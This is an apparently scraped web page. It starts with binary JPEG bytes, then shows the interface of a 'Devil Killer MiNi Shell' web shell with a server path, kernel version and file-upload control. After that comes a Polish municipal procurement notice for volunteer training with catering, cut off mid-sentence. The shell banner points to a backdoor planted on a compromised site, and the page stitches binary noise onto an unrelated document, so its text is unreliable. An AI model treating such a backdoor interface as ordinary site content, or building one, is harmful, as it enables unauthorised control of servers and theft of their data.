JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20210621/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20210621/0008943101-N-2021.html

<header hidden><table style="border-bottom: 1px solid black; width:100%"><tr><td>Ogłoszenie nr 2021/BZP 00089431 z dnia 2021-06-21</td></tr></table></header><main><!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Usługi<br/> Przeprowadzenie szkolenia pn.„Wychowawca wypoczynku” z cateringiem oraz szkolenia z zakresu animator wolnego czasu z cateringiem w ramach proj. Radomskie Centrum Wolontariatu „Kuźnia Obywatelska”. </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">Gmina Miasta Radomia</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 670223451</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">Jana Kilińskiego 30</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Radom</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">26-610</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">mazowieckie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL921 - Radomski</span></h3> <h3 class="mb-0">1.5.7.) Numer telefonu: <span class="normal">483620876</span></h3> <h3 class="mb-0">1.5.8.) Numer faksu: <span class="normal">83620289</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">bzp@umradom.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">www.bip.radom.pl</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - jednostka samorządu terytorialnego</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Ogólne usługi publiczne</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Przeprowadzenie szkolenia pn.„Wychowawca wypoczynku” z cateringiem oraz szkolenia z zakresu animator wolnego czasu z cateringiem w ramach proj. Radomskie Centrum Wolontariatu „Kuźnia Obywatelska”. </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-fd3bc3c5-cffd-11eb-911f-9ad5f74c2a25</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2021/BZP 00089431</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2021-06-21</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2021/BZP 00000331/10/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.3.27 Usługi szkoleniowe - projekt "Kuźnia Obywatelska"</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.13.) O zamówienie mogą ubiegać się wyłącznie wykonawcy, którzy spełniają warunki określone w art. 361 ustawy – usługi społeczne: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.15.) Nazwa projektu lub programu</h3> <p class="mb-0"> Radomskie Centrum Wolontariatu "Kuźnia Obywatelska" </p> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://platformazakupowa.pl/transakcja/472139 <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">https://platformazakupowa.pl/transakcja/472139</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">1.Postęp.<br/>prowadzone jest w j. polskim w formie elektronicznej za pośrednictwem platformy zakupowej Open<br/>Nexus pod adresem:https://platformazakupowa.pl/transakcja/472139 2.W celu skrócenia czasu<br/>udzielenia odpowiedzi na pytania preferuje się, aby komunikacja między Zamaw. a Wykonawc, w tym<br/>wszelkie oświadczenia, wnioski, zawiadomienia oraz informacje, przekazywane były w formie<br/>elektronicznej za pośrednictwem platformazakupowa.pl i formularza „Wyślij wiadomość do<br/>Zamawiającego”. Za datę przekazania (wpływu) oświadczeń, wniosków, zawiadomień oraz informacji<br/>przyjmuje się datę ich przesłania za pośrednictwem platformazakupowa.pl poprzez kliknięcie<br/>przycisku„Wyślij wiadomość do Zamawiającego” po których pojawi się komunikat, że wiadomość<br/>została wysłana do Zamawiającego. 3.Zamawiający dopuszcza również komunikację w powyższym<br/>zakresie przy pomocy poczty elektronicznej wymienionej w pkt. 3 Rozdział I SWZ, tj. bzp@umradom.pl<br/>4.Za pomocą poczty elektronicznej, na wskazany w pkt. 3 adres email Wykonaw. może złożyć w<br/>szczególności: a) np. wnioski dotyczące wyjaśnienia treści SWZ (dokumentacja przesyłana przed<br/>otwarciem ofert), b) np. podmiotowe środki dowodowe i inne ewentualne oświadczenia składane na<br/>wezwanie Zamawiającego (dokumentacja przesyłana po otwarciu ofert). 5.Zamawiający będzie przekazywał Wykonaw. informacje w formie elektronicznej za pośrednictwem<br/>platformazakupowa.pl.Informacje dotyczące odpowiedzi na pytania, zmiany specyfikacji, zmiany<br/>terminu składania i otwarcia ofert Zamaw. będzie zamieszczał na platformie w sekcji “Komunikaty”.<br/>Korespondencja, której zgodnie z obowiązującymi przepisami adresatem jest konkretny Wykonawca,<br/>będzie przekazywana w formie elektronicznej za pośrednictwem platformazakupowa.pl do konkretnego<br/>Wykonaw. 6. Zamaw. zgodnie z Rozporządzeniem Prezesa RM z dnia 30.12.2020r. w sprawie<br/>sposobu sporządzania i przekazywania informacji oraz wymagań technicznych dla dokumentów<br/>elektronicznych oraz środków komunikacji elektronicznej w postępowaniu o udzielenie zamówienia<br/>publicznego lub konkursie (Dz.U. 2020r. poz. 2452), określa niezbędne wymagania sprzętowo -<br/>aplikacyjne umożliwiające pracę na platformazakupowa.pl, tj.: a) stały dostęp do sieci Internet o<br/>gwarantowanej przepustowości nie mniejszej niż 512 kb/s, b) komputer klasy PC lub MAC o<br/>następującej konfiguracji: pamięć min. 2 GB Ram, procesor Intel IV 2 GHZ lub jego nowsza wersja,<br/>jeden z systemów operacyjnych - MS Windows 7, Mac Os x 10 4, Linux, lub ich nowsze wersje, c)<br/>zainstalowana dowolna przeglądarka internetowa, w przypadku Internet Explorer minimalnie wersja 10<br/>0., d) włączona obsługa JavaScript, e) zainstalowany program Adobe Acrobat Reader lub inny<br/>obsługujący format plików.pdf, f) szyfrowanie na platformazakupowa.pl odbywa się za pomocą<br/>protokołu TLS 1.3., g) oznaczenie czasu odbioru danych przez platformę zakupową stanowi datę oraz<br/>dokładny czas (hh:mm:ss) generowany wg. czasu lokalnego serwera synchronizowanego z zegarem<br/>Głównego Urzędu Miar. 7.Formaty plików wykorzystywanych przez Wykonaw. powinny być zgodne z<br/>Obwieszczeniem Prezesa RM z 09.11.2017r. w sprawie ogłoszenia jednolitego tekstu rozporządzenia<br/>RM w sprawie Krajowych Ram Interoperacyjności, minimalnych wymagań dla rejestrów publicznych i<br/>wymiany informacji w postaci elektronicznej oraz minimalnych wymagań dla systemów<br/>teleinformatycznych. a) Zamawiający rekomenduje wykorzystanie formatów: .pdf .doc .xls .jpg (.jpeg)b)<br/>W celu ewentualnej kompresji danych Zamawiający rekomenduje wykorzystanie jednego z formatów:<br/>.zip i .7 Z 8.Ofertę składa się pod rygorem nieważności w formie elektron. opatrzonej kwalifik. podp.<br/>elektron. lub w postaci elektronicznej opatrzonej podpisem zaufanym lub podpisem osobistym. W<br/>procesie składania oferty za pośrednictwem platformazakupowa.pl, Wykonaw. powinien złożyć podpis<br/>bezpośrednio na dokumentach przesłanych za pośrednictwem platformazakupowa.pl.Szczegół. info. w<br/>przedmiotowym zakresie zawarte są w Rozdziale XVI, XIX i XX SWZ.</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">Zgodnie z art. 13 ust. 1 i 2 rozporządzenia Parlamentu<br/>Europejskiego i Rady (UE) 2016/679 z dnia 27 kwietnia 2016 r. w sprawie ochrony osób fizycznych w<br/>związku z przetwarzaniem danych osobowych i w sprawie swobodnego przepływu takich danych oraz<br/>uchylenia dyrektywy 95/46/WE (ogólne rozporządzenie o ochronie danych) (Dz. Urz. UE L 119 z<br/>04.05.2016, str. 1), dalej „RODO”, Zamawiający informuje, że: a) administratorem Pani/Pana danych<br/>osobowych jest Prezydent Miasta Radomia z siedzibą w Radomiu ul. Kilińskiego 30; b) kontakt z<br/>Inspektorem Ochrony Danych Panem Mateuszem Szczypior – iod.kontakt@umradom.pl; c) Pani/Pana<br/>dane osobowe przetwarzane będą w celu realizacji ustawowych zadań urzędu - na podstawie art. 6<br/>ust. 1 lit. b, c ogólnego rozporządzenia o ochronie danych osobowych z dnia 27 kwietnia 2016r. oraz<br/>na podstawie Art. 9 ust 2 lit a ogólnego rozporządzenia o ochronie danych osobowych z dnia 27<br/>kwietnia 2016r.; d) odbiorcami Pani/Pana danych osobowych będą wyłącznie podmioty uprawnione do<br/>uzyskania danych osobowych na podstawie przepisów prawa w tym m.in. osoby lub podmioty, którym<br/>udostępniona zostanie dokumentacja postępowania w oparciu o art. 18oraz art. 74 ust. 1 i 2 ustawy z<br/>dnia 11 września 2019 roku – Prawo zamówień publicznych (Dz. U. z2019 r. poz. 2019 z późn. zm.),<br/>dalej „ustawa Pzp”; e) Pani/Pana dane osobowe przechowywane będąw czasie określonym przepisami<br/>prawa, zgodnie z instrukcją kancelaryjną; f) posiada Pani/Pan:- napodstawie art. 15 RODO prawo do<br/>żądania od administratora dostępu do danych osobowych - napodstawie art. 16 RODO prawo do ich<br/>sprostowania*- na podstawie art.18 RODO prawo doograniczenia przetwarzania prawo żądania od administratora ograniczenia przetwarzania danychosobowych z zastrzeżeniem przypadków, o których<br/>mowa w art. 18 ust. 2 RODO **; g) ma Pani/Panprawo wniesienia skargi do organu nadzorczego<br/>(tj.Prezesa Urzędu Ochrony Danych Osobowych); h)nie przysługuje Pani/Panu:- w związku z art. 17<br/>ust.3 lit. b, d lub e RODO prawo do usunięcia danychosobowych;- prawo do przenoszenia danych<br/>osobowych, o których mowa w art. 20 RODO, - napodstawie art. 21 RODO prawo sprzeciwu, wobec<br/>przetwarzania danych osobowych, gdyż podstawąprawną przetwarzania Pani/Pana danych osobowych<br/>jest art. 6 ust. 1 lit. c RODO.*: skorzystanie zprawa do sprostowania nie może skutkować zmianą<br/>wyniku postępowania o udzielenie zamówieniapublicznego ani zmianą postanowień umowy w zakresie<br/>niezgodnym z ustawą Pzp oraz nie możenaruszać integralności protokołu oraz jego załączników. **:<br/>prawo do ograniczenia przetwarzania niema zastosowania w odniesieniu do przechowywania, w celu<br/>zapewnienia korzystania ze środków ochrony prawnej lub w celu ochrony praw innej osoby fizycznej<br/>lub prawnej, lub z uwagi na ważnewzględy interesu publicznego Unii Europejskiej lub państwa<br/>członkowskiego. Zamawiający dodatkowoinformuje, że: Wykonawca ubiegający się o udzielenie<br/>zamówienia publicznego jest zobowiązanydo wypełnienia obowiązków informacyjnych przewidzianych<br/>w art. 13 lub art. 14 RODO wobec osóbfizycznych, od których dane osobowe bezpośrednio lub<br/>pośrednio pozyskał w celu ubiegania się oudzielenie zamówienia publicznego w niniejszym<br/>postępowaniu.</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">BZP.271.1.237.238.2021.EF</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Usługi</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.1.9.) Liczba części: <span class="normal">2</span></h3> <h3 class="mb-0">4.1.10.) Ofertę można składać na wszystkie części</h3> <h3 class="mb-0">4.1.11.) Zamawiający ogranicza liczbę części zamówienia, którą można udzielić jednemu wykonawcy: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="p-2 mt-4 bg-light">Część 1</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Przedmiotem zamówienia jest usługa społeczna polegająca na przeprowadzeniu szkolenia pn. "Wychowawca Wypoczynku” wraz z cateringiem w ramach projektu Radomskie Centrum Wolontariatu "Kuźnia Obywatelska". Szczegółowy opis przedmiotu zamówienia<br/>znajduje się w Rozdziale V SWZ. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">80500000-9 - Usługi szkoleniowe</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">45 dni</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Za najkorzystniejszą uznana zostanie ta z ocenianych ofert, która uzyska<br/>najwyższą ocenę punktową. Zamawiający będzie obliczał wartość punktową oferty (zaokrągloną do<br/>dwóch miejsc po przecinku) w oparciu o następujące wzory: <br/>1) Ocena w zakresie kryterium „Cena” będzie dokonywana na podstawie ilości punktów otrzymanych przy zastosowaniu następującego wzoru (liczba punktów możliwych do uzyskania – 60). C = (Cn/Cb) × 60 pkt. gdzie: C – ilość punktów za kryterium „Cena” Cn – najniższa cena ofertowa spośród ofert nieodrzuconych Cb – cena badanej oferty. <br/>2) Ocena w zakresie kryterium „Doświadczenie zawodowe osoby wyznaczonej do przeprowadzenia kursu/szkolenia” będzie dokonywana na podstawie podanej w formularzu ofertowym ilości zrealizowanych szkoleń/kursów przez osobę wyznaczoną do przeprowadzenia szkolenia/kursu z zakresu zleconego szkolenia/kursu, tj. Wychowawca wypoczynku (liczba punktów możliwych do uzyskania – 40).<br/>Ocena przeprowadzona zostanie wg poniższego zestawienia:<br/>Ilość zrealizowanych szkoleń/kursów z zakresu zleconego szkolenia/kursu, tj. Wychowawca wypoczynku 6 i więcej – otrzyma 40 pkt.<br/>Ilość zrealizowanych szkoleń/kursów z zakresu zleconego szkolenia/kursu, tj. Wychowawca wypoczynku 5 - otrzyma 30 pkt.<br/>Ilość zrealizowanych szkoleń/kursów z zakresu zleconego szkolenia/kursu, tj. Wychowawca wypoczynku 4 - otrzyma 20 pkt.<br/>Ilość zrealizowanych szkoleń/kursów z zakresu zleconego szkolenia/kursu, tj. Wychowawca wypoczynku 3 - otrzyma 10 pkt.<br/>Ilość zrealizowanych szkoleń/kursów z zakresu zleconego szkolenia/kursu, tj. Wychowawca wypoczynku 2 i mniej - otrzyma <br/>0 pkt.<br/>gdzie: D – ilość punktów za kryterium „Doświadczenie zawodowe osoby wyznaczonej do przeprowadzenia kursu/szkolenia”.<br/>3) Zamawiający wybierze ofertę, która otrzyma najwyższą liczbę punktów (P), stanowiących sumę punktów przyznanych w ramach każdego z podanych kryteriów, wyliczoną zgodnie z poniższym wzorem:<br/>P = C + D <br/>gdzie: P- liczba punktów uzyskanych przez ofertę</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Doświadczenie zawodowe osoby wyznaczonej do przeprowadzenia kursu/szkolenia</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 2</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Usługa społeczna polegająca na przeprowadzeniu szkolenia z zakresu animator wolnego czasu wraz z cateringiem w ramach projektu Radomskie Centrum Wolontariatu „Kuźnia Obywatelska”. Szczegółowy opis przedmiotu zamówienia<br/>znajduje się w Rozdziale V SWZ. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">80500000-9 - Usługi szkoleniowe</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">45 dni</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Za najkorzystniejszą uznana zostanie ta z ocenianych ofert, która uzyska<br/>najwyższą ocenę punktową. Zamawiający będzie obliczał wartość punktową oferty (zaokrągloną do<br/>dwóch miejsc po przecinku) w oparciu o następujące wzory: <br/>1) Ocena w zakresie kryterium „Cena” będzie dokonywana na podstawie ilości punktów otrzymanych przy zastosowaniu następującego wzoru (liczba punktów możliwych do uzyskania – 60). C = (Cn/Cb) × 60 pkt. gdzie: C – ilość punktów za kryterium „Cena” Cn – najniższa cena ofertowa spośród ofert nieodrzuconych Cb – cena badanej oferty. <br/>2) Ocena w zakresie kryterium „Doświadczenie zawodowe osoby wyznaczonej do przeprowadzenia szkolenia” będzie dokonywana na podstawie podanej w formularzu ofertowym ilości zrealizowanych szkoleń przez osobę wyznaczoną do przeprowadzenia szkolenia z zakresu zleconego szkolenia, m. in. Animator kultury (liczba punktów możliwych do uzyskania – 40).<br/>Ocena przeprowadzona zostanie wg poniższego zestawienia:<br/><br/>•	Ilość zrealizowanych szkoleń z zakresu zleconego szkolenia, m. in. Animator kultury 3 i więcej – otrzyma 40 pkt.<br/>•	Ilość zrealizowanych szkoleń z zakresu zleconego szkolenia, m.in. Animator kultury 2 - otrzyma 20 pkt.<br/>•	Ilość zrealizowanych szkoleń z zakresu zleconego szkolenia, m. in. Animator kultury 1 - otrzyma 0 pkt.<br/><br/>gdzie: D – ilość punktów za kryterium „Doświadczenie zawodowe osoby wyznaczonej do przeprowadzenia szkolenia”.<br/>3) Zamawiający wybierze ofertę, która otrzyma najwyższą liczbę punktów (P), stanowiących sumę punktów przyznanych w ramach każdego z podanych kryteriów, wyliczoną zgodnie z poniższym wzorem:<br/>P = C + D <br/>gdzie: P- liczba punktów uzyskanych przez ofertę</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Doświadczenie zawodowe osoby wyznaczonej do przeprowadzenia kursu/szkolenia</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> 1.	W zakresie 1 części zamówienia - o udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy spełniają warunki udziału w postępowaniu dotyczące:<br/><br/>1.1. Zdolności technicznej lub zawodowej;<br/>Wykonawca spełni warunek jeżeli udowodni, że:<br/>a)	osoby skierowane przez wykonawcę do realizacji zamówienia (kadra trenerska) posiadają 